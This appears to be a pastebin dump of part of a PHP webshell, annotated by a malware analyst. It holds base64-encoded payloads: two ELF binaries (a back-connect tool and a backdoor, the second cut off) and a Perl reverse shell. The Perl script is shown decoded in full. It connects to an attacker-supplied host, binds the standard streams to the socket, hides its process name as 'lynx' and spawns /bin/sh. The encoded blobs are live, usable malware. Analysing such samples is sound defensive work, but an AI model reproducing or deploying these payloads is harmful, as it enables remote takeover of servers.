CBretXWNqpWSXn98/x1gp8abxYTuqKDH1rQEfOZPyapdbk/jn2Xg1zRlOEUtg0Mpyuf44bff450F7wPY+qfCdD+ufIeffcM/u9e9asF717nlg4b/meQb3GvHv2zxHy/HXwKTucb3zP/jmOe/cCrWef6Z+jxrvnGTXHu+fTeed794wctNC7Z4t90Ltn/xyoh3w/13f/+fvn0McZ/T1gD63cJd+RqaYc5D36m7jUJ2+XSN+jpcdTl9P3Kf8Z+GbC+d79uYSZU63F36Clx/LwBH+NF19Dp+yPavGIWYOAAedZ7I8DbcpxLR7tWM2gun/CyG+mdchS4xmA8SzZngdUe17W7jG/N+D7PC09lrf3gcnLe9tS73Jh+z/yta/UeDyplT8jUBwfGlTxM33x8wImptNiH6bT0oCJ6fTVgNLXWaCv1/kwnrbhvuH+yul1FuOb3+XDfEJ/HMfFO141MJ++EzAxoNBPh44B9WzAxIB6OWBiQP17wMSAehvuR+6rnP6NAJePvpHwTC2ehz03WG19GjAxomqCyj6gf4p5QRMzalHQxIxyg9yfD4v8VwZNDCnE/dcxpG4LmhhS9wVNDKnvBU0MKfTHFvL8ZVRbTwdNTKkjQWUPZsH44VlwxPL4ZSXLvx40MafeC5qYU4Sro2FOzUcTvE/5Q1hYofQJ/RksrjAxqZZWmJhU11eYmFQdFSYm1R0VJibVcIWJSbW3wsSkQl90crwWwHgdqDDbe7BC2c9ZYD+PVZgYVm/C/V5N/kSFiWn1QYWJaXVWpYlphf43dEyrxkoT0+qyStVfiOd/VaWJcXWTtkaG8EMDzvcdpfbj6IsT2hqcfg+B/eog+p8NkF8CZh+LF5D5/AfDEtvA0aeH/Uxu6u7FgwPd0ueoCedfCjr/VEH4O+lhpnimKdGyfDDgzW0GMPgUyPglgbEMHPdsZnPrpLj1DCBmIEJ/NpI9Y5AZhSB8mJEk39GBbwWLxx0CWcyoAP2sPBW0+GZ677n71q7J0MumRnsXyGAmDndrs1H/EmDvQheLMdl1PHUCL5sSNB2x2PyDOyk6usQ396OVm/huWsySqIcM58cj9+vPrT4tK8Ii9wGQ07CdPsI4I8T50Nl9oOICX85UMR9yeBFknNZN2WJgeBM/rxzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRzKoRz+b4T/BjfpCEwAGAEA";
  65.  
  66. // Just Cracked this SOB!!!!!!!!!!!!!!!!!!!!
  67. // Is a binary fuzzed by XOR, grab the ELF as key string and you got the ELF Binary in text
  68. // To be injected to the infected servers!!!
  69. /. THIS SOB!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  70.  
  71. ELF (cant paste the rest of bin to text...... break the hex..) ... see the attached pic in the my twit about this
  72.  
  73. $back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
  74.  
  75. /*=========================DECODED BY MALWAREMYUSTDIE=== AN ELF BINARY BACK CONNECT===========================
  76.  
  77. ELF��������������؅4���L ������4� ��(������4���44��������������������������������������, ��, �����������, ��,,8��<�����������@ ��@@���������������(��(( ��� ���������Qtd��������������������������/lib/ld-linux.so.2�����������GNU�������������������������������������
  78. ��� ������������������������������������������������������������������������������� ������� �����������
  79. ����������������������������6�������������������q������<������� �����H�������}�������������������������������c�������'�������������������C�������:������\������������V�������6������s�������������x�������(������m�������������.�������x������}��������O�������9����������������� �������������� ����_Jv_RegisterClasses�__gmon_start__�libc.so.6�connect�execl�perror�dup2�system�socket�bzero�strcat�inet_addr�htons�exit�atoi�_IO_stdin_used�daemon�__libc_start_main�strlen�close�GLIBC_2.0��������������������������$����������ii
  80. ���������������� ��$��(��,��0��4��8 ��<
  81. ��@ ��D ��H
  82. ��L��P��T��UA�������5%����%h����%h���% h���%$h���%(h ���%,h(���%0h0���%4h8���p%8h@���`%<hH���P%@hP���@%DhX���0%Hh`��� %Lhh���%Php����%Thx���1^PTRhhhQVhOUS����[��RtX[ÐU=d�tv�`ҡ`udÉU<t����t h<Ѓv�ÐUWVSL����)č}���}����j�jPfE� E 0 PfEʃ E 01ẼE 0ËE 0@PE 0.jjjmEjEPuFy h r j�E 0EP EPUj�ujujuuj�hh ue[^_ÐUWVS ����[�� E)19s׉M)F9Ήr [^_ÉUWVS����[Ù�� ) pNu.��� [^_ÐUSR,,
  83. v�ЋuX[US����[3��P:Y[�������rm -f ���������������[-] connect()�sh -i�/bin/sh�����������������������$��� ���
  84. ���Ј���H���$���
  85. ������ ���������������� ���������������0���(������������oo���o����������������������������������������������������@��������ބ.>N^n~΅��������8�GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��GCC: (GNU) 3.4.5 20051201 (Red Hat 3.4.5-2)��.symtab�.strtab�.shstrtab�.interp�.note.ABI-tag�.hash�.dynsym�.dynstr�.gnu.version�.gnu.version_r�.rel.dyn�.rel.plt�.init�.text�.fini�.rodata�.eh_frame�.ctors�.dtors�.jcr�.dynamic�.got�.got.plt�.data�.bss�.comment�������������������������������������������������������������������������#���������((�� ������������������1���������HH������������������7��� ��������@��������������?���������$$��������������������G���o�����(����������������T���o����� ����������������c��� ������((������������������l��� ������00�������� ���������u�����������������������������p���������Ȅ������������������{���������؅����������������������������Ј�������������������������������9���������������������������(( �����������������������������,, �����������������������������44 �����������������������������<< �����������������������������@@ ���������������������������
  86. ���������������������������� 
  87. ��L��������������������������XX
  88. �� ���������������������������dd
  89. ����������������������������������d
  90. ���������������������������������r ������������������������������������@�����,��������� ����������������,�����������������������������������������������(����������H��������������������$������������������������������(����������0����� ����������
  91. �����Ȅ����� �����؅����� �����Ј�����
  92. ���������������(����������,����������4����������<����������@�������������������� ����������X����������d���������������������������������������������������������������������� ����������������,������*���4������8���<������E���`������I���d�����U��� ����� �k���T����� �������������w���0���������8���������(���������<�������������� ����������������������������@�������������q��������������������� ����� ��,������\�����*��hB���� �:������}������L�������
  93. �R�����������d��؅����� �k������������}��,������R���� �������'��������d���������� ���������������,����������:�������������������X���� ��!��Ј�����
  94. �'��,����;������6������L������������\������(������l��d�����s�� ��������h�����������������������x��������,�������������X������������9���������������� �����,�������������� ����call_gmon_start�crtstuff.c�__CTOR_LIST__�__DTOR_LIST__�__JCR_LIST__�p.0�completed.1�__do_global_dtors_aux�frame_dummy�__CTOR_END__�__DTOR_END__�__FRAME_END__�__JCR_END__�__do_global_ctors_aux�back.c�execl@@GLIBC_2.0�_DYNAMIC�close@@GLIBC_2.0�_fp_hw�perror@@GLIBC_2.0�__fini_array_end�__dso_handle�__libc_csu_fini�system@@GLIBC_2.0�_init�daemon@@GLIBC_2.0�_start�strlen@@GLIBC_2.0�__fini_array_start�__libc_csu_init�inet_addr@@GLIBC_2.0�__bss_start�main�__libc_start_main@@GLIBC_2.0�__init_array_end�dup2@@GLIBC_2.0�strcat@@GLIBC_2.0�data_start�_fini�__preinit_array_end�bzero@@GLIBC_2.0�exit@@GLIBC_2.0�atoi@@GLIBC_2.0�_edata�_GLOBAL_OFFSET_TABLE_�_end�htons@@GLIBC_2.0�connect@@GLIBC_2.0�__init_array_start�_IO_stdin_used�__data_start�socket@@GLIBC_2.0�_Jv_RegisterClasses�__preinit_array_start�__gmon_start__�
  95.  
  96.  
  97. ===== */
  98.  
  99. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  100.  
  101. /* ================DECODED BY MALWAREMUSTDIE==========================
  102. #!/usr/bin/perl
  103. use Socket;
  104. $cmd= "lynx";
  105. $system= 'echo "`uname -a`";';
  106. $system1= 'echo "`id`";';
  107. $system2= 'echo "`pwd`";';
  108. $system3= 'echo "`whoami`@`hostname`:~ >";';
  109. $system4= '/bin/sh';
  110. $0=$cmd;
  111. $target=$ARGV[0];
  112. $port=$ARGV[1];
  113. $iaddr=inet_aton($target) || die("Error: $!\n");
  114. $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
  115. $proto=getprotobyname('tcp');
  116. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
  117. connect(SOCKET, $paddr) || die("Error: $!\n");
  118. open(STDIN, ">&SOCKET");
  119. open(STDOUT, ">&SOCKET");
  120. open(STDERR, ">&SOCKET");
  121. print "\n\n:: w4ck1ng-shell (Private Build v0.3) reverse shell ::\n\n";
  122. print "\nSystem Info: ";
  123. system($system);
  124. print "\nYour ID: ";
  125. system($system1);
  126. print "\nCurrent Directory: ";
  127. system($system2);
  128. print "\n";
  129. system($system3); system($system4);
  130. close(STDIN);
  131. close(STDOUT);
  132. close(STDERR);
  133.  
  134. =====================END DECODED ================*/
  135.  
  136. $backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoE